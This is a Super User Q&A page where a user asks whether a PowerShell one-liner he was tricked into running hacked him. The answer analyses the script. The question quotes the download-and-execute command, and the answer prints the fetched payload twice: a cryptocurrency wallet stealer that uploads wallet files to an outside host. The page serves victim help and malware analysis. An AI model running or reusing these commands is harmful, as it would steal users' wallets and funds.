https://superuser.com/questions/1682702/ran-a-powershell-script-was-i-hacked
Stack Exchange Network
Stack Exchange network consists of 178 Q&A communities including
Stack Overflow, the largest, most trusted online community for
developers to learn, share their knowledge, and build their careers.
Visit Stack Exchange
[ ]
Loading...
1.
2. 0
3. +0
4.
+ Tour Start here for a quick overview of the site
+ Help Center Detailed answers to any questions you might have
+ Meta Discuss the workings and policies of this site
+ About Us Learn more about Stack Overflow the company
+ Business Learn more about hiring developers or posting ads
with us
5.
6. Log in Sign up
7. current community
+
Super User
help chat
+
Meta Super User
your communities
Sign up or log in to customize your list.
more stack exchange communities
company blog
Super User is a question and answer site for computer enthusiasts and
power users. It only takes a minute to sign up.
Sign up to join this community
[ano]
Anybody can ask a question
[ano]
Anybody can answer
[an]
The best answers are voted up and rise to the top
Super User
Sponsored by
Sponsored logo *
1.
Home
2.
1. Public
2. Questions
3.
Tags
4.
Users
5.
Unanswered
6. Find a Job
7.
Jobs
8.
Companies
3.
Teams
Stack Overflow for Teams - Collaborate and share knowledge
with a private group. [teams-illo-free-si] Create a free Team
What is Teams?
1. Teams
2.
Create free Team
Teams
Q&A for work
Connect and share knowledge within a single location that is
structured and easy to search.
Learn more
Ran a PowerShell script, Was I hacked?
Ask Question
Asked today
Active today
Viewed 3k times
19
1
I was an idiot and was suckered into running a PowerShell script. Can
anyone tell me details about it? I have a feeling they only uploaded
some files from my system.
But I am worried there may be a backdoor left running on my system.
The upload I can live with, but not a backdoor.
WARNING do NOT run this script.
iex "& { $(irm
(I separated this into two lines to prevent unintentional running it)
powershell.software/versioncheck) } RunJob"
WARNING do NOT run this script.
Please help, I don't know where else to turn.
powershell
Share
Improve this question
Follow
asked 21 hours ago
[7gj]
DonDon
29322 silver badges55 bronze badges
New contributor
Don is a new contributor to this site. Take care in asking for
clarification, commenting, and answering. Check out our Code of
Conduct.
1
*
Do you mean this one: social.technet.microsoft.com/Forums/en-US/...
???
- ChanganAuto
21 hours ago
Add a comment |
1 Answer 1
Active Oldest Votes
31
WARNING: DO NOT EXECUTE ANY OF THE CODE IN THIS ANSWER. IT IS
MALICIOUS AND HAS ONLY BEEN INCLUDED FOR DEMONSTRATIVE PURPOSES.
powershell.software/versioncheck is a malicious link
The page it leads to looks as follows:
$ErrorActionPreference = 'silentlycontinue'
Write-Host "Checking for the latest version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "You are currently running 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum
When you try to visit this link in a browser, it quickly redirects
you away from that page, to another page pretending (poorly) that the
site does not exist:
When executed in the full command you provided, however, it
recognises the following lines as Powershell commands:
$ErrorActionPreference = 'silentlycontinue'
Write-Host "Checking for the latest version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "You are currently running 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum
It is a primitive cryptocurrency wallet stealer. Every line starting
with Invoke-RestMethod attempts to send data from other possible
Cryptocurrency wallets (if you have any installed on your computer)
to a page on the endpoint http://extract.onl.
If you have any Cryptocurrency Wallets on the computer, they are now
likely compromised. Transfer anything in them to another SECURED
wallet.
Summarizing your concerns:
I have a feeling they only uploaded some files from my system.
But I am worried there may be a backdoor left running on my
system. The upload I can live with, but not a backdoor.
Yes, if these files on your computer existed, they were uploaded.
That's all that this script appears to do however, so there is no
persisting backdoor left on your system.
Share
Improve this answer
Follow
edited 16 hours ago
answered 21 hours ago
[qs2]
pigeonburgerpigeonburger
1,19144 silver badges2222 bronze badges
8
* 5
Thank you SO MUCH! You saved me days of work wiping my pc and
reinstalling from scratch.
- Don
20 hours ago
* 3
No problem :) I hope you didn't lose anything of value
- pigeonburger
17 hours ago
* 10
Both domains have NameCheap as a registrar. I sent them an abuse
report about them and included a link to this question.
- Rocket Hazmat
6 hours ago
* 8
@Don I don't see any in the provided script, my point was that
the script displayed was not uploaded by you as the one you ran.
The website may have returned a different script for pigeonburger
than it did for you.
- Jason Goemaat
5 hours ago
* 15
I uploaded a few TBs of /dev/urandom to the server - hope the
creator is fine (smiles wickedly).
- iBug
3 hours ago
| Show 3 more comments
Your Answer
Don is a new contributor. Be nice, and check out our Code of Conduct.
[ ]
[ ]
[ ]
[ ]
[ ]
[ ]
[ ]
[ ]
[ ]
[ ]
[ ]
[ ]
[ ]
[ ]
[ ]
Thanks for contributing an answer to Super User!
* Please be sure to answer the question. Provide details and share
your research!
But avoid ...
* Asking for help, clarification, or responding to other answers.
* Making statements based on opinion; back them up with references
or personal experience.
To learn more, see our tips on writing great answers.
Draft saved
Draft discarded
[ ]
Sign up or log in
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Submit
Post as a guest
Name
[ ]
Email
Required, but never shown
[ ]
Post as a guest
Name
[ ]
Email
Required, but never shown
[ ]
Post Your Answer Discard
By clicking "Post Your Answer", you agree to our terms of service,
privacy policy and cookie policy
Not the answer you're looking for? Browse other questions tagged
powershell or ask your own question.
The Overflow Blog
*
Podcast 385: Getting your first job off the CSS mailing list
*
Why hooks are the best thing to happen to React
Featured on Meta
*
Updates to Privacy Policy (September 2021)
*
Version labels for answers
*
AWS will soon be sponsoring Super User
Related
1
how to remotely setup powershell to accept Enter-PSSession
4
PowerShell - copying a file to multiple locations
2
How do version differences affect PowerShell commands on remote
computers?
8
How can I tell if my batch file is running?
3
Script is running from .ps1 physical location not from specified path
1
What is the relation between ActiveDirectory PowerShell Module and
the CSVDE utility?
Hot Network Questions
*
Isn't the day of the Lord good news?
*
Displaying 2 lines row/result in a List view and UX
*
Effects of playing excessive Tabla
*
Book about a boy and a girl trying to save mutated animals
*
Do you need advanced statistics to get rich from investing?
*
What would be an example of the Liskov Substitution Principle, if
you don't use inheritance?
*
Fnding the capacity of GeoServer to handle load
*
source of quote ~"so dumb they couldn't integrate e to the x
*
Difference between reference and measurement signal?
*
How and why was the boundary between West and East Berlin decided
to be where it was?
*
Windows 10 folder icons
*
Can I say "I live in the countryside" if I live in the urban area
of a small, remote city?
*
Why measure both alkalinity and pH in pools if pH alone tells us
how acidic or basic something is?
*
How to prevent insane wizards from killing the entire world
*
Can you identify this 1920s or 30s biplane?
*
How to shunt 1500 joules when voltage exceeds 75 VDC
*
UV islands won't align correctly
*
What is the meaning of these stencils, usually found on military
planes?
*
How do I get pin headers to reflow flat to the board?
*
How to set a file that is owned by a user but not readable by the
owner?
*
Benchmarking data copying
*
What age would Jack Napier (The Joker) be while fighting The
Batman?
*
Black hole behind glass
*
Is US health insurance just a terrible deal overall for a healthy
young adult?
more hot questions
Question feed
Subscribe to RSS
Question feed
To subscribe to this RSS feed, copy and paste this URL into your RSS
reader.
[https://superuser.co]
*
default
Super User
* Tour
* Help
* Chat
* Contact
* Feedback
* Mobile
Company
* Stack Overflow
* For Teams
* Advertise With Us
* Hire a Developer
* Developer Jobs
* About
* Press
* Legal
* Privacy Policy
* Terms of Service
* Cookie Settings
* Cookie Policy
Stack Exchange
Network
* Technology
* Life / Arts
* Culture / Recreation
* Science
* Other
* Stack Overflow
* Server Fault
* Super User
* Web Applications
* Ask Ubuntu
* Webmasters
* Game Development
* TeX - LaTeX
* Software Engineering
* Unix & Linux
* Ask Different (Apple)
* WordPress Development
* Geographic Information Systems
* Electrical Engineering
* Android Enthusiasts
* Information Security
* Database Administrators
* Drupal Answers
* SharePoint
* User Experience
* Mathematica
* Salesforce
* ExpressionEngine(r) Answers
* Stack Overflow em Portugues
* Blender
* Network Engineering
* Cryptography
* Code Review
* Magento
* Software Recommendations
* Signal Processing
* Emacs
* Raspberry Pi
* Stack Overflow na russkom
* Code Golf
* Stack Overflow en espanol
* Ethereum
* Data Science
* Arduino
* Bitcoin
* Software Quality Assurance & Testing
* Sound Design
* Windows Phone
* more (29)
* Photography
* Science Fiction & Fantasy
* Graphic Design
* Movies & TV
* Music: Practice & Theory
* Worldbuilding
* Video Production
* Seasoned Advice (cooking)
* Home Improvement
* Personal Finance & Money
* Academia
* Law
* Physical Fitness
* Gardening & Landscaping
* Parenting
* more (10)
* English Language & Usage
* Skeptics
* Mi Yodeya (Judaism)
* Travel
* Christianity
* English Language Learners
* Japanese Language
* Chinese Language
* French Language
* German Language
* Biblical Hermeneutics
* History
* Spanish Language
* Islam
* Russkii iazyk
* Russian Language
* Arqade (gaming)
* Bicycles
* Role-playing Games
* Anime & Manga
* Puzzling
* Motor Vehicle Maintenance & Repair
* Board & Card Games
* Bricks
* Homebrewing
* Martial Arts
* The Great Outdoors
* Poker
* Chess
* Sports
* more (16)
* MathOverflow
* Mathematics
* Cross Validated (stats)
* Theoretical Computer Science
* Physics
* Chemistry
* Biology
* Computer Science
* Philosophy
* Linguistics
* Psychology & Neuroscience
* Computational Science
* more (10)
* Meta Stack Exchange
* Stack Apps
* API
* Data
* Blog
* Facebook
* Twitter
* LinkedIn
* Instagram
site design / logo (c) 2021 Stack Exchange Inc; user contributions
licensed under cc by-sa. rev 2021.10.20.40515
Super User works best with JavaScript enabled [p]
Your privacy
By clicking "Accept all cookies", you agree Stack Exchange can store
cookies on your device and disclose information in accordance with
our Cookie Policy.
Accept all cookies Customize settings